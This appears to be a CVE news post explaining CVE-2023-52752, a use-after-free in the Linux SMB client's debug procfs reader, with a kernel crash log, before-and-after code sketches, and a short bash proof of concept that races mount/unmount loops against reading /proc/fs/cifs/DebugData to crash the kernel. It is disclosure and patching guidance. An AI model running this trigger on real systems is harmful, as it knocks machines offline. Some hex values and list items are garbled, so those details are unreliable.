CVE CyberSecurity Database News

CVE-2023-52752 - Use-After-Free in Linux SMB Client Debug Interface (cifs_debug_data_proc_show)

Poster -

In late 2023, a use-after-free vulnerability was discovered and patched in the Linux kernel’s SMB (CIFS) client module. This bug, tracked as CVE-2023-52752, could let local users trigger a kernel crash by simply reading debug data from the CIFS client's procfs interface (/proc/fs/cifs/DebugData) while SMB sessions are being mounted or unmounted.

In this post, we’ll break down the cause, exploitability, and fix for CVE-2023-52752, using clear language and examples.

What is the Vulnerability?

The vulnerability lay in the cifs_debug_data_proc_show function, which is responsible for displaying debug data for SMB client sessions on Linux.

During a read from /proc/fs/cifs/DebugData, the function iterated over all SMB sessions in the system but failed to properly skip sessions that were being torn down (i.e., in the process of unmounting). As a result, it could access memory that was already freed, causing a *use-after-free* bug. This usually leads to a kernel panic or crash.

Repeatedly mounting and unmounting an SMB share, and

2. Simultaneously reading from /proc/fs/cifs/DebugData.

If these actions happen at the right time, the debug function accesses stale memory, resulting in a general protection fault (GPF), as shown in the kernel log excerpt below:

[ 816.251274] general protection fault, probably for non-canonical address x6b6b6b6b6b6b6d81: 000 [#1] PREEMPT SMP NOPTI
...
[ 816.260138] Call Trace:
[ 816.260329]  <TASK>
[ 816.260499]  ? die_addr+x36/x90
[ 816.260762]  ? exc_general_protection+x1b3/x410
[ 816.261126]  ? asm_exc_general_protection+x26/x30
[ 816.261502]  ? cifs_debug_tcon+xbd/x240 [cifs]
[ 816.261878]  ? cifs_debug_tcon+xab/x240 [cifs]
[ 816.262249]  cifs_debug_data_proc_show+x516/xdb [cifs]
[ 816.262689]  ? seq_read_iter+x379/x470
[ 816.262995]  seq_read_iter+x118/x470
[ 816.263291]  proc_reg_read_iter+x53/x90
[ 816.263596]  ? srso_alias_return_thunk+x5/x7f
[ 816.263945]  vfs_read+x201/x350
[ 816.264211]  ksys_read+x75/x100
[ 816.264472]  do_syscall_64+x3f/x90
[ 816.264750]  entry_SYSCALL_64_after_hwframe+x6e/xd8
[ 816.265135] RIP: 0033:x7fd5e669d381

Here’s a simple sketch (not verbatim) of the old flawed logic in cifs_debug_data_proc_show

list_for_each_entry(ses, &tcon->ses_list, sibling) {
    // ses might be exiting and already freed elsewhere
    seq_printf(m, "SMB session: %p\n", ses);
}

If a CIFS session (ses) is being torn down (status SES_EXITING), it could get freed by another thread *while this debug function is still running*. The pointer ses is now dangling, but the code still tries to use it.

The Linux kernel patch for CVE-2023-52752 simply skips sessions that are being torn down

list_for_each_entry(ses, &tcon->ses_list, sibling) {
    if (ses->ses_status == SES_EXITING)
        continue; // Skip sessions that are exiting

    seq_printf(m, "SMB session: %p\n", ses);
}

This makes sure the debug code never tries to access memory that’s been released.

You can see the official patch here.

Proof-of-Concept (PoC) Exploit

Here’s a simple way to trigger the bug (on a vulnerable kernel) to crash the system. Do not run this on production hardware!

#!/bin/bash

# Mount and unmount SMB share in a loop
while true; do
    mount -t cifs //server/share /mnt -o guest
    sleep .2
    umount /mnt
done

At the same time, in another terminal

# Read debug data in a loop
while true; do
    cat /proc/fs/cifs/DebugData >/dev/null
done

After a short time, if unlucky, this may trigger a kernel bug (panic or GPF).

References & Further Reading

- Official patch: https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git/commit/?id=c3a7fb38716451e4a7adfeaa8e80f308937d612
- Red Hat Advisory: https://access.redhat.com/security/cve/cve-2023-52752
- CVE Description at NVD
- Linux Kernel CIFS Code

Conclusion

CVE-2023-52752 is a classic example of a race condition in kernel debug code, resulting in a use-after-free scenario. Any user on a system could easily crash the machine. The fix is simple but critical.

If you are running a Linux kernel where this patch is not present, upgrading immediately is highly recommended, especially on multi-user systems or where SMB shares are in use.

Timeline

Published on: 05/21/2024 16:15:14 UTC
Last modified on: 08/02/2024 23:11:35 UTC